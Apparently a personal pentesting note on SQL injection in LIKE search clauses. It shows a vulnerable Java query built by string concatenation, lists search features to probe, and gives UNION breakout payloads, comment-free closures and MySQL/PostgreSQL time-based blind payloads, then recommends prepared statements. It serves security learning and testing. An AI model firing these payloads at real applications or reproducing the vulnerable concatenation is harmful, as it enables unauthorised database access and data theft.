Vulnerable CodeLIKE clauses are heavily used in search features. Developers often concatenate user input directly between wildcard (%) characters. To break out, you must close the initial string quote, and then either comment out or logically neutralize the trailing % and quote.
// Vulnerable Context: Input wrapped in wildcards and strings
String searchTerm = request.getParameter(“search”);
String query = “SELECT title, body FROM articles WHERE title LIKE ’%” + searchTerm + ”%’“;
**Where To Look For The Vulnerability**
Look for any feature that searches for partial text matches.
- **Search Bars:** Finding a user, product, or article.
- **URL Parameters:** `?q=`, `?search=`, `?filter=`, `?keyword=`
- **Autocomplete/Typeahead:** API endpoints that fetch results as you type.
-- Universal Bypass (Works on Contains, Starts With, and Ends With) test' UNION {SELECT_query}-- -- Logical Closures (Use if comments are filtered) -- For "Contains" (LIKE '%{input}%'): test' UNION {SELECT_query} AND '%'=' -- For "Starts With" (LIKE '{input}%'): test' UNION {SELECT_query} AND '%'=' -- For "Ends With" (LIKE '%{input}'): test' UNION {SELECT_query} AND ''='
-- Syntax: [Valid Search]' AND [Sleep Function]---- MySQL: If user is admin, sleep 5 secondstest' AND IF((SELECT user)='admin', SLEEP(5), 0)---- PostgreSQL:test' AND (SELECT CASE WHEN ((SELECT current_user)='admin') THEN pg_sleep(5) ELSE pg_sleep(0) END)--
Mitigation
Fix: Use Prepared Statements. Additionally, if the application needs to treat user input as literal characters rather than wildcards, the user’s % and _ characters must be manually escaped (e.g., \%, \_) before being passed to the query.
Related Usage
TABLE creation_date AS "Created" FROM "05 - Content" WHERE contains(techniques, this.file.link) AND contains(tags, "🚩") SORT file.name ASC